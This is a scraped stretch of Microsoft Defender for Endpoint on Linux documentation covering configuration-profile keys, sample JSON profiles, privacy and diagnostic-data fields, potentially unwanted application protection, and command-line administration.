-|||
-|**Key**|scanFileModifyOwnership|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-##### Configure scanning of raw socket events
-When this feature is enabled, Defender for Endpoint will scan network socket events such as creation of raw sockets / packet sockets, or setting socket option.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
->[!NOTE]
->This feature is applicable only when the `enableRawSocketEvent` feature is enabled. For more information, see [Advanced optional features](linux-preferences.md#configure-monitoring-of-raw-socket-events) section below for details.
-
-|Description|Value|
-|||
-|**Key**|scanNetworkSocketEvent|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
--
-### Cloud-delivered protection preferences
-
-The *cloudService* entry in the configuration profile is used to configure the cloud-driven protection feature of the product.
-
-> [!NOTE]
-> Cloud-delivered protection is applicable with any Enforcement level settings (real_time, on_demand, passive).
-
-|Description|Value|
-|||
-|**Key**|cloudService|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-#### Enable / disable cloud delivered protection
-
-Determines whether cloud-delivered protection is enabled on the device or not. To improve the security of your services, we recommend keeping this feature turned on.
-
-|Description|Value|
-|||
-|**Key**|enabled|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-
-#### Diagnostic collection level
-
-Diagnostic data is used to keep Defender for Endpoint secure and up to date, detect, diagnose and fix problems, and also make product improvements. This setting determines the level of diagnostics sent by the product to Microsoft.
-
-|Description|Value|
-|||
-|**Key**|diagnosticLevel|
-|**Data type**|String|
-|**Possible values**|optional <p> required (default)|
-
-#### Configure cloud block level
-
-This setting determines how aggressive Defender for Endpoint is in blocking and scanning suspicious files. If this setting is on, Defender for Endpoint is more aggressive when identifying suspicious files to block and scan; otherwise, it is less aggressive and therefore blocks and scans with less frequency.
-
-There are five values for setting cloud block level:
--- Normal (`normal`): The default blocking level.-- Moderate (`moderate`): Delivers verdict only for high confidence detections.-- High (`high`): Aggressively blocks unknown files while optimizing for performance (greater chance of blocking non-harmful files).-- High Plus (`high_plus`): Aggressively blocks unknown files and applies additional protection measures (might impact client device performance).-- Zero Tolerance (`zero_tolerance`): Blocks all unknown programs.-
-|Description|Value|
-|||
-|**Key**|cloudBlockLevel|
-|**Data type**|String|
-|**Possible values**|normal (default) <p> moderate <p> high <p> high_plus <p> zero_tolerance|
-|**Comments**|Available in Defender for Endpoint version 101.56.62 or higher.|
-#### Enable / disable automatic sample submissions
-
-Determines whether suspicious samples (that are likely to contain threats) are sent to Microsoft. There are three levels for controlling sample submission:
--- **None**: no suspicious samples are submitted to Microsoft.-- **Safe**: only suspicious samples that don't contain personally identifiable information (PII) are submitted automatically. This is the default value for this setting.-- **All**: all suspicious samples are submitted to Microsoft.-
-|Description|Value|
-|||
-|**Key**|automaticSampleSubmissionConsent|
-|**Data type**|String|
-|**Possible values**|none <p> safe (default) <p> all|
-
-#### Enable / disable automatic security intelligence updates
-
-Determines whether security intelligence updates are installed automatically:
-
-|Description|Value|
-|||
-|**Key**|automaticDefinitionUpdateEnabled|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
--
-### Advanced optional features
-
-The following settings can be configured to enable certain advanced features.
-
->[!NOTE]
->Enabling these features might impact device performance. It is recommended to keep the defaults.
-
-|Description|Value|
-|||
-|**Key**|features|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-#### Module load feature
-
-Determines whether module load events (file open events on shared libraries) are monitored.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
-|Description|Value|
-|||
-|**Key**|moduleLoad|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.68.80 or higher.|
-
-#### Supplementary sensor configurations
-
-The following settings can be used to configure certain advanced supplementary sensor features.
-
-|Description|Value|
-|||
-|**Key**|supplementarySensorConfigurations|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-##### Configure monitoring of file modify permissions events
-Determines whether file modify permissions events (`chmod`) are monitored.
-
->[!NOTE]
->When this feature is enabled, Defender for Endpoint will monitor changes to the execute bits of files, but not scan these events. For more information, see [Advanced scanning features](linux-preferences.md#configure-scanning-of-file-modify-permissions-events) section for more details.
-
-|Description|Value|
-|||
-|**Key**|enableFilePermissionEvents|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-##### Configure monitoring of file modify ownership events
-Determines whether file modify ownership events (chown) are monitored.
-
->[!NOTE]
->When this feature is enabled, Defender for Endpoint will monitor changes to the ownership of files, but not scan these events. For more information, see [Advanced scanning features](linux-preferences.md#configure-scanning-of-file-modify-ownership-events) section for more details.
-
-|Description|Value|
-|||
-|**Key**|enableFileOwnershipEvents|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-##### Configure monitoring of raw socket events
-Determines whether network socket events involving creation of raw sockets / packet sockets, or setting socket option, are monitored.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
->[!NOTE]
->When this feature is enabled, Defender for Endpoint will monitor these network socket events, but not scan these events. For more information, see [Advanced scanning features](linux-preferences.md#configure-scanning-of-raw-socket-events) section above for more details.
-
-|Description|Value|
-|||
-|**Key**|enableRawSocketEvent|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-##### Configure monitoring of boot loader events
-Determines whether boot loader events are monitored and scanned.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
-|Description|Value|
-|||
-|**Key**|enableBootLoaderCalls|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.68.80 or higher.|
-
-##### Configure monitoring of ptrace events
-Determines whether ptrace events are monitored and scanned.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
-|Description|Value|
-|||
-|**Key**|enableProcessCalls|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.68.80 or higher.|
-
-##### Configure monitoring of pseudofs events
-Determines whether pseudofs events are monitored and scanned.
-> [!NOTE]
-> This feature is applicable only when Behavior Monitoring is enabled.
-
-|Description|Value|
-|||
-|**Key**|enablePseudofsCalls|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.68.80 or higher.|
-
-##### Configure monitoring of module load events using eBPF
-Determines whether module load events are monitored using eBPF and scanned.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
-|Description|Value|
-|||
-|**Key**|enableEbpfModuleLoadEvents|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.68.80 or higher.|
-
-#### Report AV Suspicious Events to EDR
-
-Determines whether suspicious events from Antivirus are reported to EDR.
-
-|Description|Value|
-|||
-|**Key**|sendLowfiEvents|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-### Network protection configurations
-
-The following settings can be used to configure advanced Network Protection inspection features to control what traffic gets inspected by Network Protection.
-
->[!NOTE]
->For these to be effective, Network Protection has to be turned on. For more information, see [Turn on network protection for Linux](network-protection-linux.md).
-
-|Description|Value|
-|||
-|**Key**|networkProtection|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-#### Configure ICMP inspection
-Determines whether ICMP events are monitored and scanned.
-
->[!NOTE]
->This feature is applicable only when Behavior Monitoring is enabled.
-
-|Description|Value|
-|||
-|**Key**|disableIcmpInspection|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-## Recommended configuration profile
-
-To get started, we recommend the following configuration profile for your enterprise to take advantage of all protection features that Defender for Endpoint provides.
-
-The following configuration profile will:
--- Enable real-time protection (RTP)-- Specify how the following threat types are handled:
- - **Potentially unwanted applications (PUA)** are blocked
- - **Archive bombs** (file with a high compression rate) are audited to the product logs
-- Enable automatic security intelligence updates-- Enable cloud-delivered protection-- Enable automatic sample submission at `safe` level-
-### Sample profile
-
-```JSON
-{
- "antivirusEngine":{
- "enforcementLevel":"real_time",
- "threatTypeSettings":[
- {
- "key":"potentially_unwanted_application",
- "value":"block"
- },
- {
- "key":"archive_bomb",
- "value":"audit"
- }
- ]
- },
- "cloudService":{
- "automaticDefinitionUpdateEnabled":true,
- "automaticSampleSubmissionConsent":"safe",
- "enabled":true,
- "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
- }
-}
-```
-
-## Full configuration profile example
-
-The following configuration profile contains entries for all settings described in this document and can be used for more advanced scenarios where you want more control over the product.
-
->[!NOTE]
->It is not possible to control all Microsoft Defender for Endpoint communication with only a proxy setting in this JSON.
-
-### Full profile
-
-```JSON
-{
- "antivirusEngine":{
- "enforcementLevel":"real_time",
- "behaviorMonitoring": "enabled",
- "scanAfterDefinitionUpdate":true,
- "scanArchives":true,
- "scanHistoryMaximumItems": 10000,
- "scanResultsRetentionDays": 90,
- "maximumOnDemandScanThreads":2,
- "exclusionsMergePolicy":"merge",
- "exclusions":[
- {
- "$type":"excludedPath",
- "isDirectory":false,
- "path":"/var/log/system.log<EXAMPLE DO NOT USE>"
- },
- {
- "$type":"excludedPath",
- "isDirectory":true,
- "path":"/run<EXAMPLE DO NOT USE>"
- },
- {
- "$type":"excludedPath",
- "isDirectory":true,
- "path":"/home/*/git<EXAMPLE DO NOT USE>"
- },
- {
- "$type":"excludedFileExtension",
- "extension":".pdf<EXAMPLE DO NOT USE>"
- },
- {
- "$type":"excludedFileName",
- "name":"cat<EXAMPLE DO NOT USE>"
- }
- ],
- "allowedThreats":[
- "<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"
- ],
- "disallowedThreatActions":[
- "allow",
- "restore"
- ],
- "nonExecMountPolicy":"unmute",
- "unmonitoredFilesystems": ["nfs,fuse"],
- "threatTypeSettingsMergePolicy":"merge",
- "threatTypeSettings":[
- {
- "key":"potentially_unwanted_application",
- "value":"block"
- },
- {
- "key":"archive_bomb",
- "value":"audit"
- }
- ]
- },
- "cloudService":{
- "enabled":true,
- "diagnosticLevel":"optional",
- "automaticSampleSubmissionConsent":"safe",
- "automaticDefinitionUpdateEnabled":true,
- "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
- }
-}
-```
-
-## Add tag or group ID to the configuration profile
-
-When you run the `mdatp health` command for the first time, the value for the tag and group ID will be blank. To add tag or group ID to the `mdatp_managed.json` file, follow the below steps:
-
-1. Open the configuration profile from the path `/etc/opt/microsoft/mdatp/managed/mdatp_managed.json`.
- 2. Go down to the bottom of the file, where the `cloudService` block is located.
- 3. Add the required tag or group ID as following example at the end of the closing curly bracket for the `cloudService`.
-
-```JSON
- },
- "cloudService": {
- "enabled": true,
- "diagnosticLevel": "optional",
- "automaticSampleSubmissionConsent": "safe",
- "automaticDefinitionUpdateEnabled": true,
- "proxy": "http://proxy.server:port/"
-},
-"edr": {
- "groupIds":"GroupIdExample",
- "tags": [
- {
- "key": "GROUP",
- "value": "Tag"
- }
- ]
- }
-}
-```
-
- >[!NOTE]
- >Add the comma after the closing curly bracket at the end of the `cloudService` block. Also, make sure that there are two closing curly brackets after adding Tag or Group ID block (please see the above example). At the moment, the only supported key name for tags is `GROUP`.
-
-## Configuration profile validation
-
-The configuration profile must be a valid JSON-formatted file. There are many tools that can be used to verify this. For example, if you have `python` installed on your device:
-
-```bash
-python -m json.tool mdatp_managed.json
-```
-
-If the JSON is well-formed, the above command outputs it back to the Terminal and returns an exit code of `0`. Otherwise, an error that describes the issue is displayed and the command returns an exit code of `1`.
-
-## Verifying that the mdatp_managed.json file is working as expected
-
-To verify that your /etc/opt/microsoft/mdatp/managed/mdatp_managed.json is working properly, you should see "[managed]" next to these settings:
--- cloud_enabled-- cloud_automatic_sample_submission_consent-- passive_mode_enabled-- real_time_protection_enabled-- automatic_definition_update_enabled-
->[!NOTE]
->No restart of mdatp daemon is required for changes to _most_ configurations in mdatp_managed.json to take effect.
- **Exception:** The following configurations require a daemon restart to take effect:
-> - cloud-diagnostic
-> - log-rotation-parameters
-## Configuration profile deployment
-
-Once you've built the configuration profile for your enterprise, you can deploy it through the management tool that your enterprise is using. Defender for Endpoint on Linux reads the managed configuration from the */etc/opt/microsoft/mdatp/managed/mdatp_managed.json* file.
--
security Linux Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-privacy.md
- Title: Privacy for Microsoft Defender for Endpoint on Linux
-description: Privacy controls, how to configure policy settings that impact privacy and information about the diagnostic data that is collected in Microsoft Defender for Endpoint on Linux.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 12/18/2020--
-# Privacy for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Microsoft is committed to provide you with the information and controls you need to make choices about how your data is collected and used when you're using Defender for Endpoint on Linux.
-
-This article describes the privacy controls available within the product, how to manage these controls with policy settings, and more details on the data events that are collected.
-
-## Overview of privacy controls in Microsoft Defender for Endpoint on Linux
-
-This section describes the privacy controls for the different types of data that is collected by Defender for Endpoint on Linux.
-
-### Diagnostic data
-
-Diagnostic data is used to keep Defender for Endpoint secure and up to date, detect, diagnose and fix problems, and also make product improvements.
-
-Some diagnostic data is required, while some diagnostic data is optional. We give you the ability to choose whether to send us required or optional diagnostic data by using privacy controls, such as policy settings for organizations.
-
-There are two levels of diagnostic data for Defender for Endpoint client software that you can choose from:
--- **Required**: The minimum data necessary to help keep Defender for Endpoint secure, up to date, and performing as expected on the device it's installed on.-- **Optional**: Other data that helps Microsoft make product improvements and provides enhanced information to help detect, diagnose, and remediate issues.-
-By default, only required diagnostic data is sent to Microsoft.
-
-### Cloud delivered protection data
-
-Cloud delivered protection is used to provide increased and faster protection with access to the latest protection data in the cloud.
-
-Enabling the cloud-delivered protection service is optional, however it's highly recommended because it provides important protection against malware on your endpoints and across your network.
-
-### Sample data
-
-Sample data is used to improve the protection capabilities of the product, by sending Microsoft suspicious samples so they can be analyzed. Enabling automatic sample submission is optional.
-
-There are three levels for controlling sample submission:
--- **None**: no suspicious samples are submitted to Microsoft.-- **Safe**: only suspicious samples that don't contain personally identifiable information (PII) are submitted automatically. This is the default value.-- **All**: all suspicious samples are submitted to Microsoft.-
-## Manage privacy controls with policy settings
-
-If you're an IT administrator, you might want to configure these controls at the enterprise level.
-
-The privacy controls for the various types of data that is described in the preceding section are described in detail in [Set preferences for Defender for Endpoint on Linux](linux-preferences.md).
-
-As with any new policy settings, you should carefully test them out in a limited, controlled environment to ensure the settings that you configure have the desired effect before you implement the policy settings more widely in your organization.
-
-## Diagnostic data events
-
-This section describes what is considered required diagnostic data and what is considered optional diagnostic data, along with a description of the events and fields that are collected.
-
-### Data fields that are common for all events
-
-There's some information about events that is common to all events, regardless of category or data subtype.
-
-The following fields are considered common for all events:
-
-|Field|Description|
-|||
-|platform|The broad classification of the platform on which the app is running. Allows Microsoft to identify on which platforms an issue may be occurring so that it can correctly be prioritized.|
-|machine_guid|Unique identifier associated with the device. Allows Microsoft to identify whether issues are impacting a select set of installs and how many users are impacted.|
-|sense_guid|Unique identifier associated with the device. Allows Microsoft to identify whether issues are impacting a select set of installs and how many users are impacted.|
-|org_id|Unique identifier associated with the enterprise that the device belongs to. Allows Microsoft to identify whether issues are impacting a select set of enterprises and how many enterprises are impacted.|
-|hostname|Local device name (without DNS suffix). Allows Microsoft to identify whether issues are impacting a select set of installs and how many users are impacted.|
-|product_guid|Unique identifier of the product. Allows Microsoft to differentiate issues impacting different flavors of the product.|
-|app_version|Version of the Defender for Endpoint on Linux application. Allows Microsoft to identify which versions of the product are showing an issue so that it can correctly be prioritized.|
-|sig_version|Version of security intelligence database. Allows Microsoft to identify which versions of the security intelligence are showing an issue so that it can correctly be prioritized.|
-|supported_compressions|List of compression algorithms supported by the application, for example `['gzip']`. Allows Microsoft to understand what types of compressions can be used when it communicates with the application.|
-|release_ring|Ring that the device is associated with (for example Insider Fast, Insider Slow, Production). Allows Microsoft to identify on which release ring an issue may be occurring so that it can correctly be prioritized.|
-
-### Required diagnostic data
-
-**Required diagnostic data** is the minimum data necessary to help keep Defender for Endpoint secure, up to date, and perform as expected on the device it's installed on.
-
-Required diagnostic data helps to identify problems with Microsoft Defender for Endpoint that may be related to a device or software configuration. For example, it can help determine if a Defender for Endpoint feature crashes more frequently on a particular operating system version, with newly introduced features, or when certain Defender for Endpoint features are disabled. Required diagnostic data helps Microsoft detect, diagnose, and fix these problems more quickly so the impact to users or organizations is reduced.
-
-#### Software setup and inventory data events
-
-**Microsoft Defender for Endpoint installation / uninstallation**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|correlation_id|Unique identifier associated with the installation.|
-|version|Version of the package.|
-|severity|Severity of the message (for example Informational).|
-|code|Code that describes the operation.|
-|text|Additional information associated with the product installation.|
-
-**Microsoft Defender for Endpoint configuration**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|antivirus_engine.enable_real_time_protection|Whether real-time protection is enabled on the device or not.|
-|antivirus_engine.passive_mode|Whether passive mode is enabled on the device or not.|
-|cloud_service.enabled|Whether cloud delivered protection is enabled on the device or not.|
-|cloud_service.timeout|Time out when the application communicates with the Defender for Endpoint cloud.|
-|cloud_service.heartbeat_interval|Interval between consecutive heartbeats sent by the product to the cloud.|
-|cloud_service.service_uri|URI used to communicate with the cloud.|
-|cloud_service.diagnostic_level|Diagnostic level of the device (required, optional).|
-|cloud_service.automatic_sample_submission|Automatic sample submission level of the device (none, safe, all).|
-|cloud_service.automatic_definition_update_enabled|Whether automatic definition update is turned on or not.|
-|edr.early_preview|Whether the device should run EDR early preview features.|
-|edr.group_id|Group identifier used by the detection and response component.|
-|edr.tags|User-defined tags.|
-|features.\[optional feature name\]|List of preview features, along with whether they're enabled or not.|
-
-#### Product and service usage data events
-
-**Security intelligence update report**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|from_version|Original security intelligence version.|
-|to_version|New security intelligence version.|
-|status|Status of the update indicating success or failure.|
-|using_proxy|Whether the update was done over a proxy.|
-|error|Error code if the update failed.|
-|reason|Error message if the update failed.|
-
-#### Product and service performance data events for required diagnostic data
-
-**Kernel extension statistics**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|version|Version of Defender for Endpoint on Linux.|
-|instance_id|Unique identifier generated on kernel extension startup.|
-|trace_level|Trace level of the kernel extension.|
-|subsystem|The underlying subsystem used for real-time protection.|
-|ipc.connects|Number of connection requests received by the kernel extension.|
-|ipc.rejects|Number of connection requests rejected by the kernel extension.|
-|ipc.connected|Whether there's any active connection to the kernel extension.|
-
-#### Support data
-
-**Diagnostic logs**:
-
-Diagnostic logs are collected only with the consent of the user as part of the feedback submission feature. The following files are collected as part of the support logs:
--- All files under */var/log/microsoft/mdatp*-- Subset of files under */etc/opt/microsoft/mdatp* that are created and used by Defender for Endpoint on Linux-- Product installation and uninstallation logs under /var/log/microsoft/mdatp/*.log-
-### Optional diagnostic data
-
-**Optional diagnostic data** is additional data that helps Microsoft make product improvements and provides enhanced information to help detect, diagnose, and fix issues.
-
-If you choose to send us optional diagnostic data, required diagnostic data is also included.
-
-Examples of optional diagnostic data include data Microsoft collects about product configuration (for example number of exclusions set on the device) and product performance (aggregate measures about the performance of components of the product).
-
-#### Software setup and inventory data events for optional diagnostic data
-
-**Microsoft Defender for Endpoint configuration**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|connection_retry_timeout|Connection retry time-out when communication with the cloud.|
-|file_hash_cache_maximum|Size of the product cache.|
-|crash_upload_daily_limit|Limit of crash logs uploaded daily.|
-|antivirus_engine.exclusions[].is_directory|Whether the exclusion from scanning is a directory or not.|
-|antivirus_engine.exclusions[].path|Path that was excluded from scanning.|
-|antivirus_engine.exclusions[].extension|Extension excluded from scanning.|
-|antivirus_engine.exclusions[].name|Name of the file excluded from scanning.|
-|antivirus_engine.scan_cache_maximum|Size of the product cache.|
-|antivirus_engine.maximum_scan_threads|Maximum number of threads used for scanning.|
-|antivirus_engine.threat_restoration_exclusion_time|Time out before a file restored from the quarantine can be detected again.|
-|antivirus_engine.threat_type_settings|Configuration for how different threat types are handled by the product.|
-|filesystem_scanner.full_scan_directory|Full scan directory.|
-|filesystem_scanner.quick_scan_directories|List of directories used in quick scan.|
-|edr.latency_mode|Latency mode used by the detection and response component.|
-|edr.proxy_address|Proxy address used by the detection and response component.|
-
-**Microsoft Auto-Update configuration**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|how_to_check|Determines how product updates are checked (for example automatic or manual).|
-|channel_name|Update channel associated with the device.|
-|manifest_server|Server used for downloading updates.|
-|update_cache|Location of the cache used to store updates.|
-
-### Product and service usage
-
-#### Diagnostic log upload started report
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|sha256|SHA256 identifier of the support log.|
-|size|Size of the support log.|
-|original_path|Path to the support log (always under */var/opt/microsoft/mdatp/wdavdiag/*).|
-|format|Format of the support log.|
-
-#### Diagnostic log upload completed report
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|request_id|Correlation ID for the support log upload request.|
-|sha256|SHA256 identifier of the support log.|
-|blob_sas_uri|URI used by the application to upload the support log.|
-
-#### Product and service performance data events for product service and usage
-
-**Unexpected application exit (crash)**:
-
-Unexpected application exits and the state of the application when that happens.
-
-**Kernel extension statistics**:
-
-The following fields are collected:
-
-|Field|Description|
-|||
-|pkt_ack_timeout|The following properties are aggregated numerical values, representing count of events that happened since kernel extension startup.|
-|pkt_ack_conn_timeout||
-|ipc.ack_pkts||
-|ipc.nack_pkts||
-|ipc.send.ack_no_conn||
-|ipc.send.nack_no_conn||
-|ipc.send.ack_no_qsq||
-|ipc.send.nack_no_qsq||
-|ipc.ack.no_space||
-|ipc.ack.timeout||
-|ipc.ack.ackd_fast||
-|ipc.ack.ackd||
-|ipc.recv.bad_pkt_len||
-|ipc.recv.bad_reply_len||
-|ipc.recv.no_waiter||
-|ipc.recv.copy_failed||
-|ipc.kauth.vnode.mask||
-|ipc.kauth.vnode.read||
-|ipc.kauth.vnode.write||
-|ipc.kauth.vnode.exec||
-|ipc.kauth.vnode.del||
-|ipc.kauth.vnode.read_attr||
-|ipc.kauth.vnode.write_attr||
-|ipc.kauth.vnode.read_ex_attr||
-|ipc.kauth.vnode.write_ex_attr||
-|ipc.kauth.vnode.read_sec||
-|ipc.kauth.vnode.write_sec||
-|ipc.kauth.vnode.take_own||
-|ipc.kauth.vnode.link||
-|ipc.kauth.vnode.create||
-|ipc.kauth.vnode.move||
-|ipc.kauth.vnode.mount||
-|ipc.kauth.vnode.denied||
-|ipc.kauth.vnode.ackd_before_deadline||
-|ipc.kauth.vnode.missed_deadline||
-|ipc.kauth.file_op.mask||
-|ipc.kauth_file_op.open||
-|ipc.kauth.file_op.close||
-|ipc.kauth.file_op.close_modified||
-|ipc.kauth.file_op.move||
-|ipc.kauth.file_op.link||
-|ipc.kauth.file_op.exec||
-|ipc.kauth.file_op.remove||
-|ipc.kauth.file_op.unmount||
-|ipc.kauth.file_op.fork||
-|ipc.kauth.file_op.create||
-
-## Resources
--- [Privacy at Microsoft](https://privacy.microsoft.com/)
security Linux Pua https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-pua.md
- Title: Detect and block potentially unwanted applications with Microsoft Defender for Endpoint on Linux
-description: Detect and block Potentially Unwanted Applications (PUA) using Microsoft Defender for Endpoint on Linux.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 12/18/2020--
-# Detect and block potentially unwanted applications with Microsoft Defender for Endpoint on Linux
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-The potentially unwanted application (PUA) protection feature in Defender for Endpoint on Linux can detect and block PUA files on endpoints in your network.
-
-These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. PUA can also refer to applications that are considered to have poor reputation.
-
-These applications can increase the risk of your network being infected with malware, cause malware infections to be harder to identify, and can waste IT resources in cleaning up the applications.
-
-## How it works
-
-Defender for Endpoint on Linux can detect and report PUA files. When configured in blocking mode, PUA files are moved to the quarantine.
-
-When a PUA is detected on an endpoint, Defender for Endpoint on Linux keeps a record of the infection in the threat history. The history can be visualized from the Microsoft Defender portal or through the `mdatp` command-line tool. The threat name will contain the word "Application".
-
-## Configure PUA protection
-
-PUA protection in Defender for Endpoint on Linux can be configured in one of the following ways:
--- **Off**: PUA protection is disabled.-- **Audit**: PUA files are reported in the product logs, but not in Microsoft Defender XDR. No record of the infection is stored in the threat history and no action is taken by the product.-- **Block**: PUA files are reported in the product logs and in Microsoft Defender XDR. A record of the infection is stored in the threat history and action is taken by the product.-
-> [!WARNING]
-> By default, PUA protection is configured in **Audit** mode.
-
-You can configure how PUA files are handled from the command line or from the management console.
-
-### Use the command-line tool to configure PUA protection:
-
-In Terminal, execute the following command to configure PUA protection:
-
-```bash
-mdatp threat policy set --type potentially_unwanted_application --action [off|audit|block]
-```
-
-### Use the management console to configure PUA protection:
-
-In your enterprise, you can configure PUA protection from a management console, such as Puppet or Ansible, similarly to how other product settings are configured. For more information, see the [Threat type settings](linux-preferences.md#threat-type-settings) section of the [Set preferences for Defender for Endpoint on Linux](linux-preferences.md) article.
-
-## Related articles
--- [Set preferences for Defender for Endpoint on Linux](linux-preferences.md)
security Linux Resources https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-resources.md
- Title: Microsoft Defender for Endpoint on Linux resources-
-description: Describes resources for Microsoft Defender for Endpoint on Linux, including how to uninstall it, how to collect diagnostic logs, CLI commands, and known issues with the product.
------- m365-security-- tier3-- mde-linux-- Previously updated : 10/30/2023--
-# Resources
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-## Collect diagnostic information
-
-If you can reproduce a problem, first increase the logging level, run the system for some time, and then restore the logging level to the default.
-
-1. Increase logging level:
-
- ```bash
- mdatp log level set --level debug
- ```
-
- ```Output
- Log level configured successfully
- ```
-
-2. Reproduce the problem.
-
-3. Run the following command to back up Defender for Endpoint's logs. The files will be stored inside of a .zip archive.
-
- ```bash
- sudo mdatp diagnostic create
- ```
-
- This command will also print out the file path to the backup after the operation succeeds:
-
- ```Output
- Diagnostic file created: <path to file>
- ```
-
-4. Restore logging level:
-
- ```bash
- mdatp log level set --level info
- ```
-
- ```Output
- Log level configured successfully
- ```
-
-## Log installation issues
-
-If an error occurs during installation, the installer will only report a general failure.
-
-The detailed log will be saved to `/var/log/microsoft/mdatp/install.log`.
-If you experience issues during installation, send us this file so we can help diagnose the cause.
-
-## Uninstall Defender for Endpoint on Linux
-
-There are several ways to uninstall Defender for Endpoint on Linux. If you are using a configuration tool such as Puppet, follow the package uninstallation instructions for the configuration tool.
-
-### Manual uninstallation
--- `sudo yum remove mdatp` for RHEL and variants(CentOS and Oracle Linux).-- `sudo zypper remove mdatp` for SLES and variants.-- `sudo apt-get purge mdatp` for Ubuntu and Debian systems.-- `sudo dnf remove mdatp` for Mariner-
-## Configure from the command line
-
-Important tasks, such as controlling product settings and triggering on-demand scans, can be done from the command line.
-
-### Global options
-
-By default, the command-line tool outputs the result in human-readable format. In addition, the tool also supports outputting the result as JSON, which is useful for automation scenarios. To change the output to JSON, pass `--output json` to any of the below commands.
-
-### Supported commands
-
-The following table lists commands for some of the most common scenarios. Run `mdatp help` from the Terminal to view the full list of supported commands.
-
-<br>
-
-****
-
-|Group|Scenario|Command|
-||||
-|Configuration|Turn on/off real-time protection|`mdatp config real-time-protection --value [enabled\|disabled]`|
